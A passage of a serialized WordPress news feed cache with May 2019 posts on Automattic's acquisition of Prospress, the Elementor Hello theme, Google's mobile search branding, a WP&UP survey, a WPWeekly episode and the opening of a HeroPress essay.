\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:85:"WPTavern: Automattic Acquires Prospress, the company behind WooCommerce Subscriptions";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=90102";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:95:"https://wptavern.com/automattic-acquires-prospress-the-company-behind-woocommerce-subscriptions";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:4052:"<p><a href="https://automattic.com/" rel="noopener noreferrer" target="_blank">Automattic</a> has acquired <a href="https://prospress.com/" rel="noopener noreferrer" target="_blank">Prospress</a> and its flagship <a href="https://woocommerce.com/products/woocommerce-subscriptions/" rel="noopener noreferrer" target="_blank">WooCommerce Subscriptions</a> product, along with the company&#8217;s entire suite of e-commerce plugins and automation tools. Prospress&#8217; 20 employees will be joining Automattic to continue developing and supporting their products.</p>\n<p>There are no immediate changes planned for current WooCommerce Subscriptions customers. Automattic will begin working on a roadmap for the product after integrating the Prospress team into the company.</p>\n<p>In the <a href="https://woocommerce.com/posts/prospress-joins-automattic-to-jointly-develop-woocommerce-subscriptions/" rel="noopener noreferrer" target="_blank">announcement Q&#038;A</a>, Prospress founder Brent Shepherd said he is excited to see how Subscriptions will integrate with Automattic&#8217;s existing products and offered a glimpse at what they may be working on in the near future:</p>\n<blockquote><p>In more specific terms, that could mean looking at closer relationships with how payments are handled, or integrations with other platforms such as WordPress.com. There are also a couple of things to solve both in WooCommerce and subscriptions to help them scale better. Interestingly, these challenges are almost identical for the two codebases. By working more closely to solve them than we ever could apart, I hope we can do a better job of implementing solutions and in a shorter time frame.</p></blockquote>\n<p>WooCommerce Subscriptions can already be purchased a la carte and used on WordPress.com stores, so nothing will change in this department. I asked Paul Maiorana, head of partnerships for WooCommerce, if there are any plans to integrate Subscription functionality with Jetpack sites, as the plugin&#8217;s team is currently pursuing a Membership feature that is essentially recurring payments.</p>\n<p>&#8220;We’re excited to learn from the Prospress team as they’re experts in this space, and could see Memberships potentially leveraging some of the Subscriptions code to avoid duplicating efforts — but we have no plans to integrate the products,&#8221; Maiorana said.</p>\n<p>The Prospress acquisition also includes <a href="https://automatewoo.com/" rel="noopener noreferrer" target="_blank">AutomateWoo</a>, a marketing automation tool, and <a href="https://robotninja.com/" rel="noopener noreferrer" target="_blank">Robot Ninja</a>, which offers automated checkout testing for WooCommerce stores. <a href="https://prospress.com/automatewoo-joins-prospress/" rel="noopener noreferrer" target="_blank">Prospress acquired AutomateWoo</a> in June 2018 as a complementary product to Subscriptions. There are no immediate changes planned for these products that would affect customers.</p>\n<p>Prospress has been deeply invested in the WooCoommerce open source project for many years. WooCommerce has 834 contributors and Shepherd is currently among the top 10. His company <a href="https://prospress.com/five-for-the-future-of-woocommerce/" rel="noopener noreferrer" target="_blank">committed to the five for the future initiative</a> last year by sponsoring one of its employees to contribute full time to WooCommerce core. For the past five years Shepherd has also co-organized the WooCommerce San Francisco meet-up.</p>\n<p>Cornering the market on Subscriptions and being able to ensure a tight integration for customers gives WooCommerce a more competitive edge in the broader e-commerce space. Prospress&#8217; smaller products are also strategic additions to WooCommerce&#8217;s offerings. If Automattic can integrate the marketing automation and automated checkout testing tools in one hosted package, these tools have the potential to greatly increase customer&#8217;s success and confidence in their WooCommerce powered stores.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 23 May 2019 23:20:27 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:3;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:69:"WPTavern: Take the 2019 WP&amp;UP Mental Health and Well-Being Survey";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=90124";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:75:"https://wptavern.com/take-the-2019-wpup-mental-health-and-well-being-survey";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:652:"<p><a href="https://wpandup.org/">WP&amp;UP</a> is a mental health and well-being charitable organization founded by Dan Maby in 2018, whose mission is to promote positive mental health throughout the WordPress ecosystem. </p>\n\n\n\n<p>The organization is currently <a href="https://wpandup.org/survey-2019.html">hosting a survey</a> to better understand the needs of the community. </p>\n\n\n\n<p>The questions cover the general work environment, general mental health and well-being, and specific work-related mental health and well-being. The survey will close next week and the results will be anonymized, open-sourced, and shared with the community. </p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 23 May 2019 22:29:49 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:4;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:34:"Matt: Prospress joining Automattic";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:22:"https://ma.tt/?p=49589";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:51:"https://ma.tt/2019/05/prospress-joining-automattic/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:1351:"<p>As you may have <a href="https://woocommerce.com/posts/prospress-joins-automattic-to-jointly-develop-woocommerce-subscriptions/">read on the WooCommerce blog</a>, <a href="https://prospress.com/final-prospress-post/">Prospress blog</a>, <a href="https://wptavern.com/automattic-acquires-prospress-the-company-behind-woocommerce-subscriptions">WP Tavern</a>, <a href="https://poststatus.com/automattic-has-acquired-prospress-the-makers-of-woocommerce-subscriptions/">Post Status</a>, <a href="https://techcrunch.com/2019/05/23/automattic-acquires-subscription-payment-company-prospress/">or Techcrunch</a>, the team at <a href="https://prospress.com/">Prospress</a> is joining forces with <a href="https://woocommerce.com/">WooCommerce</a> at <a href="https://automattic.com/">Automattic</a> to help accelerate the adoption and democratization of ecommerce across the web. Whew that&#8217;s a lot of links! Prospress was best known for their extension that allowed many types of Subscriptions on top of WooCommerce, but also has some <a href="https://automatewoo.com/">cool marketing automation</a> and <a href="https://robotninja.com/">automated testing tools</a> as well. I love that Prospress was already a Five for the Future company, which aligns really well with Automattic&#8217;s long-term goals and contributions to the wider community.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 23 May 2019 22:18:33 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:4:"Matt";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:5;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:87:"Post Status: Automattic has acquired Prospress, the makers of WooCommerce Subscriptions";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:31:"https://poststatus.com/?p=62313";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:97:"https://poststatus.com/automattic-has-acquired-prospress-the-makers-of-woocommerce-subscriptions/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:5108:"<p>Automattic has acquired <a href="https://prospress.com/">Prospress</a>, the team led by Brent Shepherd, and the makers of the largest WooCommerce extension, <a href="https://woocommerce.com/products/woocommerce-subscriptions/">WooCommerce Subscriptions</a>.</p>\n\n\n\n<p>The acquisition secures a future for Subscriptions under the primary Automattic umbrella, and it&#8217;s an increasingly important part of WooCommerce&#8217;s success.</p>\n\n\n\n<p>Subscriptions offers the most powerful and flexible subscription option in the eCommerce market, and it&#8217;s common for stores to use WooCommerce because they need Subscriptions.</p>\n\n\n\n<p>Other providers, namely market leader Shopify, do not offer an in-house subscription option, and their third-party options are not nearly as advanced as WooCommerce Subscriptions.</p>\n\n\n\n<p>Prospress brings a couple other products and services with them  <br />— <a href="https://automatewoo.com">AutomateWoo</a> and <a href="https://robotninja.com">Robot Ninja</a> primarily — but Subscriptions is the real breadwinner. It has long been the highest revenue extension in the WooCommerce marketplace.</p>\n\n\n\n<p>Paul Maiorana, WooCommerce&#8217;s Head of Payments, Shipping, and Partnerships, tells me, <span class="pullquote alignleft">&#8220;Subscriptions is an important differentiator for WooCommerce amongst eCommerce platforms, and we’re really excited to now be working closely with the Prospress team to create a more unified experience.&#8221;</span></p>\n\n\n\n<p>I have known Brent and his team for a long time, and I&#8217;ve used Subscriptions for many years. It&#8217;s an outstanding and complex project that requires enormous amounts of testing, a skilled development team, and a lot of care.</p>\n\n\n\n<p>In 2017, the <a href="https://poststatus.com/notes/woocommerce-offering-20-higher-rates-trade-third-party-developers-offering-support/">support structure changed</a> for third-party WooCommerce extensions, which led to an immediate surge of support hiring by the largest extension providers — namely Prospress and SkyVerge — for whom, for the purpose of disclosure, I do contract work.</p>\n\n\n\n<p>Support is the biggest component of a plugin company, especially for a complex one like Subscriptions, which interfaces (sometimes in very different ways) with dozens of payment processors. I have seen spec documentation for their proposed new features, and it is astounding how much detail is required to be outlaid before a single line of code is changed or written.</p>\n\n\n\n<p>With Automattic, a company that formerly consisted of a few dozen folks now has the backing of hundreds of &#8220;Happiness Engineers&#8221; to help manage the load.</p>\n\n\n\n<p>The primary risk I see for Subscriptions with Automattic is that it will get lost in the fray if Prospress developers are pulled to other work and more pressing needs. I have perceived this to be the case with their ownership of WP Job Manager, WooCommerce Bookings, and some other extensions — though none with the significance of Subscriptions. I think the strategic importance of Subscriptions <em>should</em> keep that at bay under good management, and I know Automattic management understands that strategic importance.</p>\n\n\n\n<p>Automattic will eventually go public, I&#8217;m almost certain. Strategically, I fully believe the Prospress acquisition is the right move for them. If I were involved, I would&#8217;ve been trying to make this acquisition for years now.</p>\n\n\n\n<p>Having significant revenue streams under the scope of a company out of your control is a risk, to my thinking as a theoretical investor. I would take this now in-house feature set direct to marketing channels against Shopify  <br />— which is an absolute juggernaut in the eCommerce space today, particularly among high revenue generating stores. </p>\n\n\n\n<p>I don&#8217;t know what led Brent to make the choice to join Automattic now, but it&#8217;s a much-deserved exit after something like eight years of work.</p>\n\n\n\n<p>Brent said the following <a href="https://woocommerce.com/posts/prospress-joins-automattic-to-jointly-develop-woocommerce-subscriptions/">in the announcement Q&amp;A</a>:</p>\n\n\n\n<blockquote class="wp-block-quote"><p>I’m extremely proud of what we’ve achieved at Prospress. I’ve had the great pleasure of having some amazing people join me over the years. Together I believe we’ve advanced a mission that matters to me — so much so that it predated Prospress and even WooCommerce.</p><p>I believe joining Automattic is the best next stage for Prospress, and I am personally excited to lead the transition and work with the Automattic team to further WooCommerce.</p></blockquote>\n\n\n\n<p>I&#8217;m very happy for Brent and the entire Prospress team. I hope they made a fortune with this acquisition; in my mind, Subscriptions is one of the key reasons for WooCommerce&#8217;s amazing growth as a platform. I think they will do great there, and I have no doubt they will stay committed to making Subscriptions continue as a terrific tool in the toolbox that is WooCommerce.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 23 May 2019 19:31:16 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:15:"Brian Krogsgard";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:6;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:74:"WPTavern: Google Updates Mobile Search Results to Include Website Branding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=90077";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:85:"https://wptavern.com/google-updates-mobile-search-results-to-include-website-branding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:1999:"<p>Google is rolling out an <a href="https://www.blog.google/products/search/new-design-google-search/" rel="noopener noreferrer" target="_blank">update to mobile search results</a> that includes website branding. The new design displays a website&#8217;s name and icon at the top of the listing so users can easily scan results. If the result is an ad, it will be indicated in bold next to the website&#8217;s address. Below is a before and after look at the visual refresh of the mobile search results page:</p>\n<p><a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2019/05/branded-mobile-search-results.png?ssl=1"><img /></a>image credit: <a href="https://www.blog.google/products/search/new-design-google-search/">Google</a></p>\n<p>Google <a href="https://support.google.com/webmasters/answer/9290858" rel="noopener noreferrer" target="_blank">automatically fetches a website&#8217;s favicon for search results</a>, so most website owners with a favicon already in place should not have to do anything to enable branded mobile search results. </p>\n<p>In 2015, <a href="https://wordpress.org/news/2015/08/billie/" rel="noopener noreferrer" target="_blank">WordPress 4.3</a> added Site Icon support to the Customizer, so users do not need to rely on a plugin to upload a favicon. WordPress stores the icon so that users do not have to upload it again when switching themes. </p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2019/05/site-icon-customizer.png?ssl=1"><img /></a></p>\n<p>A simple, recognizable favicon establishes a visual identity for your site, and Google&#8217;s updates to mobile search results should be a strong reminder not to forget one when building a new site. Site owners may even want to spend more time designing the icon, now that a favicon&#8217;s usefulness extends beyond browser tabs to lend more authority to search results. The changes are just now rolling out to mobile but will likely be coming to desktop searches in the near future.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 23 May 2019 17:06:25 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:7;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:57:"WPTavern: Elementor Launches Hello Theme on WordPress.org";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=90021";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:68:"https://wptavern.com/elementor-launches-hello-theme-on-wordpress-org";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:5367:"<p>Elementor launched its <a href="https://wordpress.org/themes/hello-elementor/" rel="noopener noreferrer" target="_blank">Hello theme on WordPress.org</a> this week. After just a few days in the directory, the theme already has more than 10,000 active installations. It is essentially a blank starter theme that offers 100% compatibility with <a href="https://wordpress.org/plugins/elementor/" rel="noopener noreferrer" target="_blank">Elementor</a>. </p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2019/05/hello-screenshot.png?ssl=1"><img /></a></p>\n<p>Page builders with a large user base are in a unique position to influence the WordPress theme market. Loyal users will often select a page builder before choosing a theme from a limited pool of those that boast compatibility with their preferred plugin. Elementor is no exception, with more than 2 million installations and a 4.8-star average rating on WordPress.org.</p>\n<p>Lately the trend with some of the most popular and intuitive WordPress themes is to offer a strong, niche design out of the box, where users don&#8217;t have to make too many choices or fiddle with settings. Hello takes a different path, opeorating as more of a conduit to the Elementor page template library. </p>\n<p>The theme&#8217;s screenshot shows a home page designed in Elementor but the actual theme has very few styles and doesn&#8217;t look like anything out of the box.</p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2019/05/Screen-Shot-2019-05-22-at-1.44.58-PM.png?ssl=1"><img /></a></p>\n<p>Once installed, the first step is to create a page and select &#8220;Edit in Elementor.&#8221; From there users can select from a library of different landing page templates or start building their own layouts from scratch.</p>\n<p><a href="https://i0.wp.com/wptavern.com/wp-content/uploads/2019/05/Screen-Shot-2019-05-22-at-4.50.56-PM.png?ssl=1"><img /></a></p>\n<p>Hello is not a new theme. Elementor first released it on GitHub in March 2018. Hosting it on WordPress.org allows users to more easily install it and get automatic updates for improvements and security fixes. </p>\n<p>&#8220;The plugin repository played a huge role in Elementor’s exceptional growth, and we hold similar high hopes for the Hello theme,&#8221; Elementor CMO Ben Pines said.</p>\n<p>There are a few major drawbacks to using the Hello theme that may hinder its potential growth. Access to headers, footers, and widgets is restricted to Elementor Pro users. This seems like a confusing way to build a WordPress site and might be a useful detail to include in the theme&#8217;s description on WordPress.org. If there&#8217;s another way to access headers and footers without purchasing Elementor Pro, I wasn&#8217;t able to find it.</p>\n<p>WooCommerce store owners should be aware that the Hello theme does not yet offer comprehensive support for WooCommerce page styles. Although the release post advertises the theme as having &#8220;out-of-the-box&#8221; compatibility with WooCommerce, the store pages are bare bones and not very attractive. One user commented that the checkout and cart pages do not look very inviting and asked if it will be possible to edit fonts and colors with Elementor. </p>\n<p>Elementor representative Matan Naveh responded to multiple concerns about WooCommerce support and said that full compatibility is still in development:</p>\n<blockquote><p>WooCommerce is a highly complex plugin and any pages that rely on its basic elements (e.g. Cart, My Account, Checkout, etc.) are even more so. The level of complexity is such that changes in something as routine as a WooCommerce update could cause havoc on a layout, resulting in a devastating effect on the webpage’s functionality.</p>\n<p>Currently, Elementor enables you to customize the areas surrounding the WooCommerce elements. Take the cart page, for example – You may not be able to customize the table itself, but you can customize the title or the area where the table is located. You can also insert your own images, backgrounds, and content according to your needs (e.g. adding an FAQ).</p>\n<p>We are considering several options for achieving full compatibility with WooCommerce. But this is still in its development stages.</p></blockquote>\n<p>Some users who switched from the Astra theme, another one commonly used by Elementor users, have <a href="https://elementor.com/blog/introducing-hello-theme/#comment-27019" rel="noopener noreferrer" target="_blank">reported</a> <a href="https://elementor.com/blog/introducing-hello-theme/#comment-27035" rel="noopener noreferrer" target="_blank">significant (50%) decreases</a> in loading time on real world sites after switching to the Hello theme. Elementor claims that it is &#8220;the fastest WordPress theme ever created,&#8221; but the comparison benchmarks posted don&#8217;t include any themes that are known for high performance. </p>\n<p>Elementor is working on creating a child theme for Hello. It is currently in development on <a href="https://github.com/elementor/hello-theme-child" rel="noopener noreferrer" target="_blank">GitHub</a> and the team is working on getting it approved for WordPress.org.</p>\n<p>The primary purpose of the Hello theme is to offer compatibility with the page builder, but it is not recommended for users who are not using Elementor. </p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 23 May 2019 02:10:04 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:8;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:73:"WPTavern: WPWeekly Episode 353 – Slack of Boundaries and A Walk to WCEU";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:59:"https://wptavern.com/?p=90052&preview=true&preview_id=90052";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:80:"https://wptavern.com/wpweekly-episode-353-slack-of-boundaries-and-a-walk-to-wceu";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2125:"<p>In this episode, <a href="http://jjj.me">John James Jacoby</a> and I discuss an article published by Vox on how Slack is not improving productivity, especially in large team environments. We highlight what&#8217;s new in WordPress 5.2.1, why libraries are important to the communities they serve, and new security features in WordPress 5.2. At the end of the show, we send a shoutout and good wishes to Marcel Bootsman who has begun his walk to WordCamp EU.</p>\n<h2>Stories Discussed:</h2>\n<p><a href="https://wordpress.org/news/2019/05/wordpress-5-2-1-maintenance-release/">WordPress 5.2.1 Released</a></p>\n<p><a href="https://www.vox.com/recode/2019/5/1/18511575/productivity-slack-google-microsoft-facebook">The Productivity Pit: How Slack Is Ruining Work</a></p>\n<p><a href="https://walktowc.eu/2019/05/19/stage-1-gouda/">Marcel Bootsman begins his walk to WCEU</a></p>\n<p><a href="https://wptavern.com/wordpress-5-2-improves-the-security-of-automatic-updates">WordPress 5.2 Improves the Security of Automatic Updates</a></p>\n<p><a href="https://wptavern.com/loveland-public-library-to-host-free-beginners-wordpress-class-online-may-22-2019">Loveland Public Library to Host Free Beginners WordPress Class Online May 22, 2019</a></p>\n<h2>Transcript:</h2>\n<p><a href="https://wptavern.com/wp-content/uploads/2019/05/EPISODE-353-Slack-of-Boundaries-and-A-Walk-to-WCEU-Transcript.rtf">EPISODE 353 &#8211; Slack of Boundaries and A Walk to WCEU Transcript</a></p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, May 29th 3:00 P.M. Eastern</p>\n<p>Subscribe to <a href="https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738">WordPress Weekly via Itunes</a></p>\n<p>Subscribe to <a href="https://www.wptavern.com/feed/podcast">WordPress Weekly via RSS</a></p>\n<p>Subscribe to <a href="http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr">WordPress Weekly via Stitcher Radio</a></p>\n<p>Subscribe to <a href="https://play.google.com/music/listen?u=0#/ps/Ir3keivkvwwh24xy7qiymurwpbe">WordPress Weekly via Google Play</a></p>\n<p><strong>Listen To Episode #353:</strong><br />\n</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 22 May 2019 22:47:58 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:9;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:48:"HeroPress: Growing Through Translating WordPress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:56:"https://heropress.com/?post_type=heropress-essays&p=2828";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:148:"https://heropress.com/essays/growing-through-translating-wordpress/#utm_source=rss&utm_medium=rss&utm_campaign=growing-through-translating-wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:20861:"<img width="960" height="480" src="https://s20094.pcdn.co/wp-content/uploads/2020/05/052219-min-1024x512.jpg" class="attachment-large size-large wp-post-image" alt="Pull Quote: It takes time to build trust." /><p><a href="https://heropress.com/feed/#ja">このエッセーは日本語でも読めます。</a></p>\n<p>I have spent most of my adult life knowing WordPress. In November 2003, a few months after I discovered WordPress, I gave it a spin on my personal blog. A few months later, I started contributing in the form of translating WordPress core and documentation into Japanese.</p>\n<p>Today, I make a living as a project and community manager in the field of translation &amp; localization. I get to help people all over the world publish their voice online using their own language, while raising two kids in Tokyo, Japan. This is all thanks to WordPress, which showed me the brand new world of open source I never knew existed, and those who had given me the opportunity to participate in it.</p>\n<p>Let me share my story about how WordPress has changed my life.</p>\n<img />WordCamp Tokyo 2018 organizing team &amp; volunteer staff\n<h3>Discovering WordPress</h3>\n<p>I first found WordPress in the summer of 2003. At that time, with a degree in graphic design at a state university in the Midwest, I was working in a field that had nothing to do with design or web. The small web marketing company I joined after graduation couldn’t make it through the 